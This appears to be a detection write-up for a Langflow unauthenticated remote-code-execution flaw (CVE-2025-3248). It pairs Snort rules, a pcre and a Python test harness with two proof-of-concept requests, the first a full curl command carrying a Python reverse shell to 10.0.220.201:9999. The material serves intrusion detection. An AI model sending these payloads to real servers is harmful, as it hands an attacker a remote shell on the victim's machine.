Poc case #1
Poc 1
curl -X POST -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code": "@exec(\"import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"10.0.220.201\\\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\\\"/bin/sh\\\")\")\ndef foo():\n pass"}'
snort rule example 1
# Snort 2.9 syntax: the request-body modifier is http_client_body (http_raw_body is a Snort 3 sticky buffer, not a 2.x content modifier)
alert tcp $EXTERNAL_NET any -> $HOME_NET 8000 (msg:"CVE-2025-3248 Langflow Unauth RCE Attempt"; flow:to_server,established; content:"POST"; http_method; content:"/api/v1/validate/code"; http_uri; content:"code"; http_client_body; content:"@exec"; http_client_body; classtype:attempted-admin; sid:1000001; rev:1;)
ref. (optional pcre to also catch other execution primitives in the request body):
pcre:"/code.*(__import__|subprocess|os\.system)/i";
Poc 2
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')): pass
alert tcp $EXTERNAL_NET any -> $HOME_NET 8000 (msg:"CVE-2025-3248 Langflow Unauth RCE PoC Attempt - Subprocess Execution"; flow:to_server,established; content:"POST"; http_method; content:"/api/v1/validate/code"; http_uri; content:"code"; http_client_body; content:"exec"; http_client_body; content:"subprocess"; http_client_body; content:"check_output"; http_client_body; content:"shell=True"; http_client_body; classtype:attempted-admin; sid:1000002; rev:1;)
Poc1 && Poc2
alert tcp $EXTERNAL_NET any -> $HOME_NET 8000 (msg:"CVE-2025-3248 Langflow Unauth RCE Common Pattern"; flow:to_server,established; content:"POST"; http_method; content:"/api/v1/validate/code"; http_uri; content:"code"; http_client_body; content:"exec"; http_client_body; classtype:attempted-admin; sid:1000004; rev:1;)
Content matches shared by both PoCs (the basis of the combined sid:1000004 rule):
content:"POST";
content:"/api/v1/validate/code";
content:"code";
content:"exec";
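The combined "Common Pattern" rule and the optional pcre can be checked offline before deploying them to a sensor. The following is an added example (not code from the original post) that re-implements the rule's four content matches and the pcre in Python and runs them over constructed, harmless request samples; the request objects are assumed to be already-parsed HTTP fields, and none of the sample bodies is an actual payload. It also shows the coverage gap the pcre closes: a body that uses __import__ but never the string "exec" is missed by the base rule.

```python
import re
from dataclasses import dataclass


@dataclass
class HttpRequest:
    """Minimal parsed HTTP request (hypothetical structure for this example)."""
    method: str
    uri: str
    body: str


# Mirrors sid:1000004: POST + validate/code URI + "code" and "exec" in the body.
def matches_common_pattern(req: HttpRequest) -> bool:
    return (
        req.method == "POST"
        and "/api/v1/validate/code" in req.uri
        and "code" in req.body
        and "exec" in req.body
    )


# Mirrors the ref. pcre: /code.*(__import__|subprocess|os\.system)/i
# Snort's "." does not cross newlines without /s, so no re.DOTALL here.
PCRE = re.compile(r"code.*(__import__|subprocess|os\.system)", re.IGNORECASE)


def matches_pcre_extension(req: HttpRequest) -> bool:
    # The pcre is only meaningful on requests to the same endpoint.
    return (
        req.method == "POST"
        and "/api/v1/validate/code" in req.uri
        and PCRE.search(req.body) is not None
    )


def classify(req: HttpRequest) -> list:
    """Return the names of the detections that fire for one request."""
    hits = []
    if matches_common_pattern(req):
        hits.append("common_pattern")
    if matches_pcre_extension(req):
        hits.append("pcre_extension")
    return hits


# Constructed samples (not captured traffic). Bodies are inert snippets that
# only reproduce the *shape* the rules key on.
SAMPLES = {
    "benign_post": HttpRequest(
        "POST", "/api/v1/validate/code",
        r'{"code": "def foo():\n    return 1\n"}'),
    "exec_decorator": HttpRequest(
        "POST", "/api/v1/validate/code",
        r'{"code": "@exec(\"print(1)\")\ndef foo():\n    pass"}'),
    "import_only": HttpRequest(
        "POST", "/api/v1/validate/code",
        r'{"code": "x = __import__(\"os\")"}'),
    "wrong_path": HttpRequest(
        "POST", "/api/v1/other",
        r'{"code": "exec(\"print(1)\")"}'),
    "get_method": HttpRequest(
        "GET", "/api/v1/validate/code", ""),
}


def run_samples() -> dict:
    """Classify every sample; returns {sample_name: [detections]}."""
    return {name: classify(req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in run_samples().items():
        print(f"{name:15s} -> {hits or ['no alert']}")
```

Note that `content:"exec"` is a plain substring match, so any legitimate snippet containing words such as "execute" also fires sid:1000004; tune with the more specific sid:1000001/1000002 rules or the pcre if that noise matters in your environment.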